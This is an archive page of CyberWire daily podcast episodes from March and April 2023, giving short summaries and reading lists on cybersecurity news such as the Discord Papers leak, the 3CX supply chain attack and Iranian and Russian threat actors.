You too can reach the most influential leaders in the industry. Here’s a link to our media kit. Contact us at space@n2k.com to request more info about sponsoring T-Minus.

Want to join us for an interview?

Please send your interview pitch to space-editor@n2k.com and include your name, affiliation, and topic proposal, and our editor will get back to you for scheduling.

Iranian threat actor exploits N-day vulnerabilities. Subdomain hijacking vulnerabilities. The Discord Papers. An update on Russia’s NTC Vulkan. And weather reports, not a Periodic Table. Apr 18, 2023

An Iranian threat actor exploits N-day vulnerabilities. CSC exposes subdomain hijacking vulnerabilities. More on the Discord Papers. An update on Russia’s NTC Vulkan. Joe Carrigan on the aftermath of a $98M online investment fraud. Our guest is Blake Sobczak from Synack , host of the podcast WE'RE IN! And threat actor nomenclature: a scorecard, and a Periodic Table no more.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/74

Selected reading.

Nation-state threat actor Mint Sandstorm refines tradecraft to attack high-value targets (Microsoft Security)

An Iranian hacking group went on the offensive against U.S. targets, Microsoft says (Washington Post)

New CSC Research Finds One in Five DNS Records are Susceptible to Subdomain Hijacking Due to Insufficient Cyber Hygiene | CSC (CSC)

DOD Assessing Document Disclosures and Implementing Mitigation Measures (U.S. Department of Defense)

After leak, Pentagon purges some users' access to classified programs, launches security review (Breaking Defense)

Why Did a 21-Year-Old Guardsman Have Access to State Secrets? (Vice)

U.S. officials have examined whether alleged doc leaker had foreign links (POLITICO)

The Air Force Loves War Gamers Like Alleged Leaker Teixeira (Military.com)

FBI Investigating Ex-Navy Noncommissioned Officer Linked to Pro-Russia Social-Media Account (Wall Street Journal)

Pentagon leak suggests Russia honing disinformation drive – report (the Guardian)

Dragos Analyzes Russian Programs Threatening Critical Civilian Infrastructure (Dragos)

Microsoft shifts to a new threat actor naming taxonomy (Microsoft)

Developments in the Discord Papers, including notes on influencers and why they seek influence. Tax season scams. KillNet’s selling, but is anyone buying? Apr 17, 2023

The alleged Discord Papers leaker has been charged. We look at how the Papers spread online. A life lived online as a security risk. US tax season scams, at the 11th filing hour. Caleb Barlow from Cylete on the layoffs in security that many thought would never happen. Maria Varmazis and Brandon Karpf share the launch of the new space podcast, T-Minus. And KillNet says it’s open for business.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/73

Selected reading.

Inside the furious week-long scramble to hunt down a massive Pentagon leak (CNN Politics)

Massachusetts Air National Guard’s Intelligence Mission in the Spotlight (New York Times)

Leaker of U.S. secret documents worked on military base, friend says (Washington Post)

WSJ News Exclusive | Social-Media Account Overseen by Former Navy Noncommissioned Officer Helped Spread Secrets (Wall Street Journal).

A Russian Disinformation Empire in Oak Harbor, Washington (Malcontent News)

Pro-Russia propagandist unmasked as New Jersey tropical fish seller (The Telegraph)

Suspect charged in case involving leaked classified military documents (Washington Post)

Jack Teixeira, suspect in Pentagon leaks, charged under Espionage Act (the Guardian)

Leak suspect appears in court as US spells out its case (AP NEWS)

Airman in Pentagon intel leak charged (Military Times)

Airman charged in Pentagon intel leak regretted joining the military (Military Times)

He’s from a military family — and allegedly leaked U.S. secrets (Washington Post)

Jack Teixeira's alleged Discord leaks show why the US should stop showering Top Secret clearances on 21-year-old keyboard warriors (Business Insider).

The military loved Discord for Gen Z recruiting. Then the leaks began. (Washington Post)

A new kind of leaker: Spilling state secrets to impress online buddies (Washington Post)

Was the Gen-Z Pentagon leaker motivated by social media clout? (the Guardian)

Microsoft president claims Russian intelligence is trying to "penetrate gaming communities" (GamesIndustry.biz)

How Gamers Eclipsed Spies as an Intelligence Threat (Foreign Policy)

Crafty PDF link is part of another tax-season malware campaign (Record)

Tax season scams. (CyberWire)

Ukraine at D+414: Discord Papers arrest, cyberespionage, and hacktivist DDoS. (CyberWire)

Jack Chapman: Shielding against the bad guys. [Threat Intelligence] [Career Notes] Apr 16, 2023

Jack Chapman, VP of Threat Intelligence at Egress sits down to share his story on how he found his way into the cybersecurity field as well as his journey creating a cybersecurity company that was successfully acquired. Jack previously co-founded anti-phishing company Aquilai and served as its Chief Technology Officer, working closely with the UK’s intelligence and cyber agency GCHQ to develop cutting-edge product capabilities. Aquilai was acquired by Egress in 2021. Now he is working with Egress as what he calls their "chief bad guy," helping to shield his team from threats. He says "I'm probably what you call a servant leader, my mission is to enable and shield my teams from things that will prevent them from succeeding in their missions, whatever that might look like." Jack hopes to be remembered for making a meaningful impact to help drive the field forward. We thank Jack for sharing his story with us.

New Dero cryptojacking operation concentrates on locating Kubernetes. [Research Saturday] Apr 15, 2023

Scott Fanning, Senior Director of Product Management, Cloud Security at CrowdStrike, sits down to talk about the first-ever Dero cryptojacking operation targeting Kubernetes infrastructure. The research defines Dero as "a cryptocurrency that claims to offer improved privacy, anonymity and higher and faster monetary rewards compared to Monero, which is a commonly used cryptocurrency in cryptojacking operations."

CrowdStrike was the first organization to discover Dero, and has been observing the cryptojacking operation since the beginning of February 2023. The operation focuses mainly on locating Kubernetes clusters with anonymous access enabled on a Kubernetes API and listening on non-standard ports accessible from the internet.

The research can be found here:

CrowdStrike Discovers First-Ever Dero Cryptojacking Campaign Targeting Kubernetes

"Read the Manual" and the ransomware-as-a-service market. Bitter APT against energy companies. Cozy Bear sighting. Hacktivist auxiliaries hit Canadian targets. Aan arrest in the Discord Papers case. Apr 14, 2023

"Read the Manual" and the ransomware-as-a-service market. Bitter APT may be targeting Asia-Pacific energy companies. A Cozy Bear sighting. Hacktivist auxiliaries hit Canadian targets. Deepen Desai of Zscaler describes job scams following tech layoffs. Our guest is Kelly Shortridge from Fastly with insights on the risks from bots. And there’s been an arrest in the Discord Papers case.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/72

Selected reading.

Read The Manual Locker: A Private RaaS Provider (Trellix)

Phishing Campaign Targets Chinese Nuclear Energy Industry (Intezer)

Espionage campaign linked to Russian intelligence services (Baza wiedzy)

Russian cyberspies hit NATO and EU organizations with new malware toolset (CSO Online)

Pro-Russia hackers say they were behind Hydro-Quebec cyberattack (Montreal CTV News - 04-13-2023)

Cyberattack knocks out website and mobile app for Quebec’s hydro utility (Toronto Star)

F.B.I. Arrests National Guardsman in Leak of Classified Document (New York Times)

DOD Calls Document Leak 'a Criminal Act' (U.S. Department of Defense)

Transparent Tribe seems to want people’s lab notes, and other stories of cyberespionage. The FBI warns of juicejacking. And the Discord leaker seems to have been a 20-something influencer. Apr 13, 2023

Transparent Tribe expands its activity against India's education sector. A Lazarus sub-group is after defense sector targets. The FBI's Denver office warns of potential juicejacking. Legion: a Python-based credential harvester. The source of leaked US intelligence may be closer to identification. Johannes Ullrich from SANS explains upwork scams. Our guest is Charlie "Tuna" Moore of Vanderbilt University on the cyber lessons from Russia’s war on Ukraine. Canada responds to claims of Russian cyberattacks.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/71

Selected reading.

Transparent Tribe (APT36) | Pakistan-Aligned Threat Actor Expands Interest in Indian Education Sector (SentinelOne)

Following the Lazarus group by tracking DeathNote campaign (Securelist)

DPRK threat actors target C3X and defense sector at large. (CyberWire)

FBI office warns against using public phone charging stations at airports or malls, citing malware risk (CBS News)

The FBI warns of juicejacking and other risks of public tech. (CyberWire)

Legion: an AWS Credential Harvester and SMTP Hijacker (Cado Security)

The Legion credential harvester. (CyberWire)

Leaker of U.S. secret documents worked on military base, friend says (Washington Post)

U.S. may change how it monitors the web after missing leaked documents for weeks (NBC News)

Cyberattacks on Canada’s gas infrastructure left ‘no physical damage,’ Trudeau says (Global News)

Russian attacks on Ukrainian infrastructure cause internet outages, cutting off a valuable wartime tool (CyberScoop)

US Warns Russia Getting Creative in Cyberspace (VOA)

APT Winter Vivern Resurfaces (Avertium)

Patch Tuesday notes. Cyber mercenaries described. Voice security and fraud. CISA’s update to its Zero Trust Maturity Model. Updates on Russia’s hybrid war against Ukraine. Apr 12, 2023

Patch Tuesday update. Another commercial surveillance company is outed. Voice security and the challenge of fraud. CISA updates its Zero Trust Maturity Model. Effects of the US intelligence leaks. Our guest Eric Goldstein, Executive Assistant Director for Cybersecurity at CISA, outlines CISA's role in the cybersecurity community. André Keartland of Netsurit makes the case for DevSecOps. Russian cyber auxiliaries believed responsible for disrupting the Canadian PM's website.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/70

Selected reading.

Patch Tuesday overview. (CyberWire)

DEV-0196: QuaDream’s “KingsPawn” malware used to target civil society in Europe, North America, the Middle East, and Southeast Asia (Microsoft Threat Intelligence)

Threat Report on the Surveillance-for-Hire Industry (Meta)

Sweet QuaDreams: A First Look at Spyware Vendor QuaDream’s Exploits, Victims, and Customers (The Citizen Lab)

Voice Intelligence and Security Report (Pindrop)

CISA Releases updated Zero Trust Maturity Model (Cybersecurity and Infrastructure Security Agency)

CISA Releases Zero Trust Maturity Model Version 2 (Cybersecurity and Infrastructure Security Agency CISA)

A leak of files could be America’s worst intelligence breach in a decade (The Economist)

Interagency Effort Assessing Impact of Leaked Documents, Strategizing Way Forward (U.S. Department of Defense)

What we know about the Pentagon document leak (Axios)

The ongoing scandal over leaked US intel documents, explained (Vox)

Pentagon leak threatens Biden's foreign policy doctrine ahead of overseas trip (Axios)

Schumer calls for all-senator briefing on leaked Ukraine documents (The Hill)

The key countries and revelations from the Pentagon document leak (Washington Post)

Exclusive: Leaked U.S. intel document claims Serbia agreed to arm Ukraine (Reuters)

Up to 50 UK special forces present in Ukraine this year, US leak suggests (the Guardian)

Egypt denies leak about supplying Russia with 40,000 rockets (Al Jazeera)

DDoS attacks block PM Trudeau’s web site (IT World Canada)

IAM trends. RagnarLocker as a critical infrastructure threat. AI hype as phishbait. Updates on the hybrid war: leaks and hacks. Apr 11, 2023

Key trends in Identity Access Management. RagnarLocker and critical infrastructure. Cyber criminals capitalize on the AI hype. Updates on the leaked US classified documents, and speculation of whether Russian hackers compromised a Canadian gas pipeline. Ben Yelin describes a multimillion dollar settlement over biometric data. Microsoft’s Ann Johnson from Afternoon Cyber Tea talking about cyber paradigm shifts with Samir Kapuria. And a welcome to GCHQ's new boss.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/69

Selected reading.

4 key trends from the Gartner IAM Summit 2023 (Venture Beat)

Threat Actor Spotlight: Ragnarlocker Ransomware (Sygnia)

From Chatgpt To Redline Stealer: The Dark Side Of Openai And Google Bard (Veriti)

Biden administration doesn't know extent of classified Pentagon document leak (CBS News)

Ukraine ‘alters counter-offensive plans’ after Pentagon leak (The Telegraph)

Ukraine had to change military plans because of US Pentagon leak, source says (CNN)

Leaked Pentagon documents claim that hackers breached a Canadian gas network. Here’s what to know. (Washington Post)

Pro-Russia Hackers Say They Breached Canadian Pipeline, but Experts Are Skeptical (Wall Street Journal)

Leaked US intel: Russia operatives claimed new ties with UAE (AP NEWS)

Egypt secretly planned to supply rockets to Russia, leaked U.S. document says (Washington Post)

How the Latest Leaked Documents Are Different From Past Breaches (New York Times)

How U.S. friends and foes have responded to leaked Pentagon documents (Washington Post)

Pentagon leaks: US seeks to mend ties after claims Washington spied on key allies (the Guardian)

Pentagon Probe Under Way in Leaks Case (Wall Street Journal)

Pentagon assessing damage after 'highly classified' US secrets leaked online (Breaking Defense)

The Pentagon’s Purported Classified-Document Leak: The Biggest Takeaways and Questions So Far (Wall Street Journal)

The ongoing scandal over leaked US intel documents, explained (Vox)

Leaked documents a 'very serious' risk to security: Pentagon (AP NEWS)

The Discord servers at the center of a massive US intelligence leak (CyberScoop)

Social-Media Platform Discord Emerges at Center of Classified U.S. Documents Leak (Wall Street Journal)

Why Leaked Pentagon Documents Are Still Circulating on Social Media (New York Times)

Clues Left Online Might Aid Leak Investigation, Officials Say (New York Times

Ukraine at D+411: US leaks remain under investigation. (CyberWire)

New Director GCHQ announced (GCHQ)

A look at Iran’s MERCURY APT. Updates on Russia's hybrid war, including some apparent leaks and some apparent doxing. And notes on cloud security trends. Apr 10, 2023

An Iranian APT MERCURY exploits known vulnerabilities. The US investigates apparent leaks of classified information about Russia's war against Ukraine. KillNet claims it has paralyzed NATO websites. More apparent doxing of the GRU. Britta Glade and Monica Koshgarian of RSA Conference talking about content curation. Grayson Milbourne from OpenText Cybersecurity hopes to remove shame from cyber attacks. And, finally, some notes on cloud security trends.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/68

Selected reading.

MERCURY and DEV-1084: Destructive attack on hybrid environment (Microsoft Threat Intelligence)

Leaked US battlefield intelligence on Ukraine is fake, says Kyiv (The Telegraph)

Russia Claims Leaked Pentagon Intelligence on Ukraine is U.S. Disinformation (US News and World Report)

Leaked US secret NATO-Ukraine war docs likely altered, say experts (SC Media)

Ukraine’s air defences could soon run out of missiles, apparent Pentagon leak suggests (the Guardian)

Russia nearly shot down British spy plane near Ukraine, leaked document says (Washington Post)

Justice Dept. will investigate leak of classified Pentagon documents (Washington Post)

US investigating whether Ukraine war documents were leaked (Military Times)

U.S. Reviewing Online Appearance Of Sensitive Documents Related To Ukraine, Pentagon Says (RadioFreeEurope/RadioLiberty)

WSJ News Exclusive | Pentagon Investigates More Social-Media Posts Purporting to Include Secret U.S. Documents (Wall Street Journal)

New Details on Intelligence Leak Show It Circulated for Weeks Before Raising Alarm (Wall Street Journal)

Intelligence leak exposes U.S. spying on adversaries and allies (Washington Post)

Secret US Documents on Ukraine War Plan Spill Onto Internet: Report (SecurityWeek)

US hit by ‘worst leak of secret documents since Edward Snowden’ (The Telegraph)

Ukraine at D+410: Static, sanguinary lines. (CyberWire)

Report Finds 90% of IT Professionals Have Experienced a Cybersecurity Breach (Skyhigh Security)

Karen Worstell: Keep your feet planted. [Strategy] [Career Notes] Apr 09, 2023

Karen Worstell, Senior Cybersecurity Strategist from VMware sits down to share her journey and discusses her experience as a woman in cyber. Starting her career off as a chemist, after graduating with a bachelor's degree in chemistry and a bachelor's degree in molecular biology, she took some time off to be with her family, she came back to a science field that was far more advanced than before she had left. She decided to go in another direction which led her to cyber. She started teaching herself programming and found she was very good at it. Now that she works in cyber, she says "You, you have to know yourself, know what you want, and know where you're, know where you plant your feet. I used to use a phrase a lot that said, uh, don't be afraid to take a stand but know where your feet are planted." We thank Karen for sharing her story with us.

A dark side to LLMs. [Research Saturday] Apr 08, 2023

Sahar Abdelnabi from CISPA Helmholtz Center for Information Security sits down with Dave to discuss their work on "A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models." There is currently a large advance in the capabilities of Large Language Models or LLMs, as well as being integrated into many systems, including integrated development environments (IDEs) and search engines.

The research states, "The functionalities of current LLMs can be modulated via natural language prompts, while their exact internal functionality remains implicit and unassessable." This could lead them to be susceptible to targeted adversarial prompting, as well as making them adaptable to even unseen tasks. Researchers demonstrated these said attacks to see if the LLMs needed new techniques for more defense.

The research can be found here:

More than you've asked for: A Comprehensive Analysis of Novel Prompt Injection Threats to Application-Integrated Large Language Models

Stopping Cobalt Strike abuse. Leaks are mingled with disinformation. Google offers advice for board members. Securing cars and their garages. CISA releases ICS advisories. Apr 07, 2023

Preventing abuse of the Cobalt Strike pentesting tool. US investigates a leak of sensitive documents related to the war in Ukraine. Hacktivist activity continues. Google's advice for boards. Electronic lockpicks for electronic locks. Nexx security devices may have security flaws. Tesla employees reportedly shared images and videos from Teslas in the wild. Matt O'Neill from US Secret Service discussing investment crypto scams. Our guest is James Campbell of Cado Security on the challenges of a cloud transition. And CISA releases seven ICS advisories.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/67

Selected reading.

Stopping cybercriminals from abusing security tools (Microsoft On the Issues)

Microsoft leads effort to disrupt illicit use of Cobalt Strike, a dangerous hacking tool in the wrong hands (CyberScoop)

Ukraine War Plans Leak Prompts Pentagon Investigation (New York Times)

DDoS attacks rise as pro-Russia groups attack Finland, Israel (TechRepublic)

Perspectives on Security for the Board (Google Cloud)

Thieves Use CAN Injection Hack to Steal Cars (SecurityWeek)

How thieves steal cars using vehicle CAN bus (Register)

Own a Nexx “smart” alarm or garage door opener? Get rid of it, or regret it (Graham Cluley).

Hack and enter! The “secure” garage doors that anyone can open from anywhere – what you need to know (Naked Security)

Special Report: Tesla workers shared sensitive images recorded by customer cars (Reuters)

CISA Releases Seven Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency CISA)

New phishing techniques. Arrests in the Genesis Market case. APT43’s Archipelago. Disinformation at the UN, and drop-shipping for Mother Russia. Apr 06, 2023

New phishing techniques. Arrests in the Genesis Market case. APT43’s Archipelago. Russia's turn in the Security Council chair immediately becomes an occasion for disinformation. Our guest is Nick Tausek from Swimlane to discuss supply chain attack trends. Tim Starks from the Washington Post has the latest on the DOJ’s attempts to disrupt cyber crime. And, make robo-love, not robo-war: nuisance-level hacktivism in the interest of Ukraine.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/66

Selected reading.

New Phishing Campaign Exploits YouTube Attribution Links, Cloudflare Captcha (Vade Security)

Criminal Marketplace Disrupted in International Cyber Operation (U.S. Department of Justice)

Takedown of notorious hacker marketplace selling your identity to criminals | Europol (Europol)

Notorious criminal marketplace selling victim identities taken down in international operation (National Crime Agency)

Check your hack (Politie)

Carr Announces Investigation into Suspected Users of Genesis Dark Web Marketplace Following FBI Takedown of Illicit Site (Office of Attorney General of Georgia Chris Carr)

U.S., European Police Shut Down Hacker Marketplace, Make 119 Arrests (Wall Street Journal)

120 Arrested as Cybercrime Website Genesis Market Seized by FBI (SecurityWeek)

International cops put the squeeze on Genesis Market users (Register)

FBI obtained detailed database exposing 60,000 users of the cybercrime bazaar Genesis Market (CyberScoop)

Genesis Black Market Dismantled, But Experts Warn of Potential Vacuum (Nextgov.com)

How we’re protecting users from government-backed attacks from North Korea (Google)

Google TAG Warns of North Korean-linked ARCHIPELAGO Cyberattacks (The Hacker News)

‘Outrageous’: Russia Accused of Spreading Disinformation at U.N. Event (New York Times)

Des hackers ont acheté 23.000 euros de sex-toys avec de l’argent russe (20 minutes)

Thanks to Ukrainian hackers, war freak orders £20,000 worth drones for Russian soldiers, gets sex toys instead (First Post)

Ukrainian hackers exchange Russian fighter’s drone order for dildos (New York Post)

‘It’s bullshit’: Inside the weird, get-rich-quick world of dropshipping (WIRED)

Genesis Market taken down. Proxyjackers exploit Log4j. Fast-encrypting Rorschach ransomware. More Killnet DDoS. Patch Zimbra now. Soft power and Russia’s hybrid war. Apr 05, 2023

Genesis Market gets taken down. Proxyjackers exploit Log4j vulnerabilities. Fast-encrypting Rorschach ransomware uses DLL sideloading. Killnet attempts DDoS attacks against the German ministry. Carole Theriault ponders AI assisted cheating. Johannes Ullrich tracks malware injected in a popular tax filing website. Soft power and Russia’s hybrid war.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/65

Selected reading.

'Operation Cookie Monster': International police action seizes dark web market (Reuters)

Stolen credential warehouse Genesis Market seized by FBI (Register)

FBI Seizes Bot Shop ‘Genesis Market’ Amid Arrests Targeting Operators, Suppliers (KrebsOnSecurity)

Genesis Market, one of world’s largest platforms for cyber fraud, seized by police (Record)

'Operation Cookie Monster': FBI seizes popular cybercrime forum used for large-scale identity theft (CNN)

Cybercrime marketplace Genesis Market shut by FBI, international law enforcement (CNBC)

FBI seizes stolen credentials market Genesis in Operation Cookie Monster (BleepingComputer)

Notorious Genesis Market cybercrime forum seized in international law enforcement operation (CyberScoop)

Proxyjacking has Entered the Chat (Sysdig)

Rorschach – A New Sophisticated and Fast Ransomware (Check Point Research)

Russian hackers attack German ministry’s website (TVP World)

Zimbra Flaw Exploited by Russia Against NATO Countries Added to CISA 'Must Patch' List (SecurityWeek)

Zimbra vulnerability exploited by Russian hackers targeting Nato countries - CISA (Tech Monitor)

CISA Adds One Known Exploited Vulnerability to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

NVD - CVE-2022-27926 (National Vulnerability Database)

The Interview - Russian cyber weapons 'could do a lot of damage' in the US: Former counterterrorism czar (France 24)

Biden cybersecurity chief 'surprised' Russia has not hit US targets amid Ukraine war (Washington Examiner)

Ukrainian Cyber War Confirms the Lesson: Cyber Power Requires Soft Power (Council on Foreign Relations)

Cyber appeasement? Western Digital discloses cyberattack. Rilide malware is in active use. Mantis has new mandibles. Challenges of threat hunting. Small, medium, and large criminal enterprises. Apr 04, 2023

Did "appeasement" embolden Russia's cyber operators? Western Digital discloses a cyberattack. Rilide is a new strain of malware in active use. The Mantis cyberespionage group uses new, robust tools and tactics. The challenges of threat hunting. Joe Carrigan has thoughts on public school systems making cyber security part of the curriculum. Our guest May Mitchell of Open Systems addresses closing the talent gap. And when it comes to criminal enterprise, size matters.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/64

Selected reading.

Russia's shadow war: Vulkan files leak show how Putin's regime weaponises cyberspace (The Conversation)

Russia's Invasion of Ukraine Heralds New Era of Warfare (VOA)

West’s Cyber Appeasement Gave Putin Green Light: James Stavridis (Bloomberg Law)

Western Digital Provides Information on Network Security Incident (Business Wire)

Western Digital confirms breach, shuts down systems (Computing)

Western Digital discloses network breach, My Cloud service down (BleepingComputer)

WD says law enforcement probing breach of internal systems (Register)

Western Digital investigating MyCloud data breach affecting Mac desktop drives (Macworld)

Users fume after My Cloud network breach locks them out of their data (Ars Technica)

Typhon Reborn V2: Updated stealer features enhanced anti-analysis and evasion capabilities (Cisco Talos Blog)

Mantis: New Tooling Used in Attacks Against Palestinian Targets (Symantec)

Inside the Mind of a Threat Hunter: Team Cymru's Latest Report Sheds Light on Challenges Faced by Cybersecurity Analysts (Accesswire)

Wages Dominate Cybercrime Groups' Operating Expenses (PR Newswire)

Inside the Halls of a Cybercrime Business (Trend Micro)

Size Matters: Unraveling the Structure of Modern Cybercrime Organizations (Trend Micro)

"Cylance" ransomware (no relation to Cylance). Update on the 3CX incident. The FSB's arrest of Evan Gershkovich. Ukrainian hacktivist social engineering in the hybrid war. Apr 03, 2023

"Cylance" the ransomware (with no relation to Cylance, the security company). An update on the 3CX incident. The FSB's arrest of a Wall Street Journal reporter. Simone Petrella from N2K Networks unpacks 2023 cybersecurity training trends. Deepen Desai from Zscaler has the latest on cloud security. And Hacktivists claim to have tricked wives of Russian combat pilots into revealing personal information.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/63

Selected reading.

"Cylance" ransomware (no relation to Cylance). (CyberWire Pro)

New Cylance Ransomware Targets Linux and Windows, Warn Researchers (HackRead)

New Cylance Ransomware strain emerges, experts speculate about its notorious members (IT PRO)

More evidence links 3CX supply-chain attack to North Korean hacking group (Record)

3CX supply chain attack: the unanswered questions (Computing)

3CX Desktop App Compromised (CVE-2023-29059) (Fortinet Blog)

Evan Gershkovich Loved Russia, the Country That Turned on Him (Wall Street Journal)

The Ukrainian hoax that revealed the Russian pilots who bombed Mariupol theatre (The Telegraph)

Ukrainian Hacktivists Trick Russian Military Wives for Personal Info (HackRead)

Alon Jackson: Sometimes you feel like an octopus. [CEO] [Career Notes] Apr 02, 2023

Alon Jackson, chief executive and Co-founder of Astrix Security, sits down to share his story to rising success. Before being on the vendor side of things, Jackson served in various strategic roles in the Cyber Security Division of the Israeli Military Intel Unit 8200 for more than 8 years, including leading the Cloud Security division and serving as the Head of the Cyber Security R&D Department. His experience in the military inspired him to learn more about the industry and jump to the private sector. Fast forward years later, he co-founded his company to help address security gaps seen in the industry. He mentions how being a start up CEO can be difficult sometimes, and how it may feel as though you're an octopus with all the multitasking that comes with the job. Alon says that one of his main goals as a contributor in this industry is making sure people remember him and his company for years to come, saying he wants to help by " building a company that people kind of know about, remember, and is important in the world." We thank Alon for sharing his story with us.

Blackfly flies back again. [Research Saturday] Apr 01, 2023

Dick O'Brien from Symantec’s Threat Hunter team discusses their research on "Blackfly - Espionage Group Targets Materials Technology." Researchers say the Blackfly espionage group (aka APT41), has been mounting attacks against Asian materials and composite organizations in attempts to steal intellectual property.

This group has been known as one of the longest known Chinese advanced persistent threat (APT) groups since at least 2010. The research shares that "early attacks were distinguished by the use of the PlugX/Fast (Backdoor.Korplug), Winnti/Pasteboy (Backdoor.Winnti), and Shadowpad (Backdoor.Shadowpad) malware families."

The research can be found here:

Blackfly: Espionage Group Targets Materials Technology

A glimpse into Mr. Putin’s cyber war room. 3CXDesktopAppsupply chain risk. XSS flaw in Azure SFX can lead to remote code execution. AlienFox targets misconfigured servers. Mar 31, 2023

The Vulkan papers offer a glimpse into Mr. Putin’s cyber war room. The 3CXDesktopApp vulnerability and supply chain risk. A cross site scripting flaw in Azure Service Fabric Explorer can lead to remote code execution. Rob Boyce from Accenture Security on threats toEV charging stations. Our guest is Steve Benton from Anomali Threat Research, sharing a ‘less is more’ approach to cybersecurity. And AlienFox targets misconfigured servers.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/62

Selected reading.

A Look Inside Putin's Secret Plans for Cyber-Warfare (Spiegel)

Secret trove offers rare look into Russian cyberwar ambitions (Washington Post)

7 takeaways from the Vulkan Files investigation (Washington Post)

‘Vulkan files’ leak reveals Putin’s global and domestic cyberwarfare tactics (the Guardian)

Contracts Identify Cyber Operations Projects from Russian Company NTC Vulkan (Mandiant)

3CX DesktopApp Security Alert - Mandiant Appointed to Investigate (3CX)

Information on Attacks Involving 3CX Desktop App (Trend Micro)

3CX Confirms Supply Chain Attack as Researchers Uncover Mac Component (SecurityWeek)

There’s a new supply chain attack targeting customers of a phone system with 12 million users (TechCrunch)

Super FabriXss: From XSS to an RCE in Azure Service Fabric Explorer by Abusing an Event Tab Cluster Toggle (CVE-2023-23383) (Orca Security)

Dissecting AlienFox | The Cloud Spammer’s Swiss Army Knife (SentinelOne)

A major supply chain attack is underway. Ms Connor, call your office. Combosquatting. False positives fixed. Tanks don’t work, so Russia tries more cyber. And, sadly. some official hostage-taking. Mar 30, 2023

The 3CXDesktopApp is under exploitation in a supply chain campaign. An open letter asks for a pause in advanced AI development. All your grammar and usage are belong us. Combosquatting might fool even the wary. Defender had flagged Zoom and other safe sites as dangerous. Recognizing the importance of OSINT. Matt O'Neill from US Secret Service discussing his agency’s cybersecurity mission. Our guest is Ping Li from Signifydwith a look at online fraud. And the FSB arrests a US journalist.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/61

Selected reading.

3CX DesktopApp Security Alert (3CX)

Supply Chain Attack Against 3CXDesktopApp (CISA)

Pause Giant AI Experiments: An Open Letter (Future of Life Institute)

In Sudden Alarm, Tech Doyens Call for a Pause on ChatGPT (WIRED

AI chatbots making it harder to spot phishing emails, say experts (the Guardian)

The Most Common Combosquatting Keyword Is “Support” (Akamai)

False positives in Microsoft Defender. (CyberWire)

Exploitation is a Dish Best Served Cold: Winter Vivern Uses Known Zimbra Vulnerability to Target Webmail Portals of NATO-Aligned Governments in Europe (Proofpoint)

ESET Research Podcast: A year of fighting rockets, soldiers, and wipers in Ukraine (WeLiveSecurity)

Russia Ramping Up Cyberattacks Against Ukraine (VOA)

A new age of spying gives Kyiv the upper hand (The Telegraph)

Russia arrests Wall Street Journal reporter on spying charge (AP NEWS)

Russia detains a Wall Street Journal reporter, accusing him of espionage. (New York Times)

Traffers and the threat to credentials. WiFi protocol flaw. Cross-chain bridge attacks. A shift in Russian cyber operations. Piracy is patriotic. Mar 29, 2023

Traffers and the threat to credentials. A newly discovered WiFi protocol flaw. Cross-chain bridge attacks. A shift in Russian cyber operations. Ann Johnson from Afternoon Cyber Tea chats with EY principal Adam Malone. Our guest is Toni Buhrke from Mimecast with a look at the State of Email Security. And is piracy patriotic?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/60

Selected reading.

Traffers and the growing threat against credentials (Outpost24 blog)

WiFi protocol flaw allows attackers to hijack network traffic (BleepingComputer)

Cross-chain bridge attacks. (CyberWire)

2023 Annual State of Email Security Report (Cofense)

From Ukraine to the whole of Europe:cyber conflict reaches a turning point (Thales Group)

Russia Ramps Up Cyberattacks On Ukraine Allies: Analysts (Barron's)

Pro-Russian hackers shift focus from Ukraine to EU countries (Radio Sweden)

Russian hackers attack Slovak governmental websites after country supplies Mig-29s to Ukraine (Ukrainska Pravda)

Ukraine's Defense Ministry says Russia is encouraging online piracy (The Jerusalem Post)

Twitter looks for a leaker. Insider risks. The state of resilience. Russian auxiliaries briefly disrupt a French National Assembly website. Cyber trends in the hybrid war. DPRK hacking, as it is. Mar 28, 2023

Twitter gets a subpoena for a source-code leaker’s information. The insider risk to data. Russian hacktivist auxiliaries target the French National Assembly. Recent trends in cyberattacks sustained by Ukraine. Ben Yelin unpacks the White House executive order on spyware. Mr. Security Answer Person John Pescatore ponders the permanence of ransomware. And Cyberespionage and cybercrime in the interest of Pyongyang’s weapons programs.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/59

Selected reading.

GitHub Suspends Repository Containing Leaked Twitter Source Code (SecurityWeek)

Twitter takes down source code leaked online, hunts for downloaders (BleepingComputer)

Annual Data Exposure Report 2023 (Code 42)

Russian Hackers Target French National Assembly Website (Privacy Affairs)

Pro-Russian Hacktivists: A Reaction to a Western Response to a Russian Aggression (Radware Blog)

Ukraine at D+397: Cyberespionage and battlespace preparation. (CyberWire)

APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations (Mandiant)

Evolution of criminal scams (especially BEC). Law enforcement honeypots. ChatGPT data leak. Hybrid war updates. Mar 27, 2023

